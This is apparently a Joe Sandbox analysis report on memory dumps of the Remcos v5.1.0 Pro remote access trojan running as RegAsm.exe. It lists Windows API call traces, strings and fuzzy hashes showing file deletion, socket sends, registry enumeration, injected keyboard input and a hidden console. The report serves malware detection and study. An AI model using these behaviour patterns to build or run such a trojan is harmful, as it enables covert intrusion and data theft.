                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                          • String ID: Remcos
                                                          • API String ID: 1970332568-165870891
                                                          • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                          • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                          • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                          • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • Opcode ID: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                          • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                          • Opcode Fuzzy Hash: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                          • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                          APIs
                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                          • API String ID: 1454806937-0
                                                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • _memcmp.LIBVCRUNTIME ref: 00445423
                                                          • _free.LIBCMT ref: 00445494
                                                          • _free.LIBCMT ref: 004454AD
                                                          • _free.LIBCMT ref: 004454DF
                                                          • _free.LIBCMT ref: 004454E8
                                                          • _free.LIBCMT ref: 004454F4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 1679612858-1037565863
                                                          • Opcode ID: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                          • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                          • Opcode Fuzzy Hash: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                          • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • String ID: tcp$udp
                                                          • API String ID: 0-3725065008
                                                          • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                          • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                          • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                          • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                                          • ExitThread.KERNEL32 ref: 004018F6
                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                          • String ID: PkG$XMG$NG$NG
                                                          • API String ID: 1649129571-3151166067
                                                          • Opcode ID: 856b2a5f3568ea0699b2e44769f1b54aa8307209e3fc8d56d276bdd61831f207
                                                          • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                          • Opcode Fuzzy Hash: 856b2a5f3568ea0699b2e44769f1b54aa8307209e3fc8d56d276bdd61831f207
                                                          • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                          • String ID: .part
                                                          • API String ID: 1303771098-3499674018
                                                          • Opcode ID: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
                                                          • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                          • Opcode Fuzzy Hash: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
                                                          • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                          APIs
                                                          • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                          • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Console$Window$AllocOutputShow
                                                          • String ID: Remcos v$5.1.0 Pro$CONOUT$
                                                          • API String ID: 4067487056-1043272453
                                                          • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                          • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                          • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                          • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                          • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                          • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                          • __freea.LIBCMT ref: 0044AE30
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • __freea.LIBCMT ref: 0044AE39
                                                          • __freea.LIBCMT ref: 0044AE5E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                          • API String ID: 3864826663-0
                                                          • Opcode ID: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                                                          • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                          • Opcode Fuzzy Hash: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                                                          • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                                          • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: InputSend
                                                          • API String ID: 3431551938-0
                                                          • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                          • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                          • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                          • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16_free
                                                          • String ID: a/p$am/pm$zD
                                                          • API String ID: 2936374016-2723203690
                                                          • Opcode ID: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                                                          • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                          • Opcode Fuzzy Hash: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                                                          • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                          APIs
                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Enum$InfoQueryValue
                                                          • String ID: [regsplt]$xUG$TG
                                                          • API String ID: 3554306468-1165877943
                                                          • Opcode ID: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                          • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                          • Opcode Fuzzy Hash: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                          • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                                          • __fassign.LIBCMT ref: 0044B479
                                                          • __fassign.LIBCMT ref: 0044B494
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                                          • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                          • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                          • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                          • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: D[E$D[E
                                                          • API String ID: 269201875-3695742444
                                                          • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                          • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                          • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                          • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                          • __fassign.LIBCMT ref: 1000954F
                                                          • __fassign.LIBCMT ref: 1000956A
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                                            • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                            • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                          • String ID: xUG$NG$NG$TG
                                                          • API String ID: 3114080316-2811732169
                                                          • Opcode ID: 6c4551c0fef6ea8a62e0362b81dd69ab0e8a90bfa27d8b291aed53c83e443e60
                                                          • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                          • Opcode Fuzzy Hash: 6c4551c0fef6ea8a62e0362b81dd69ab0e8a90bfa27d8b291aed53c83e443e60
                                                          • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                          APIs
                                                            • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                                            • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                            • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                            • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                          • _wcslen.LIBCMT ref: 0041B763
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                          • API String ID: 3286818993-122982132
                                                          • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                          • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                          • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                          • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                          APIs
                                                            • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                            • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                            • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
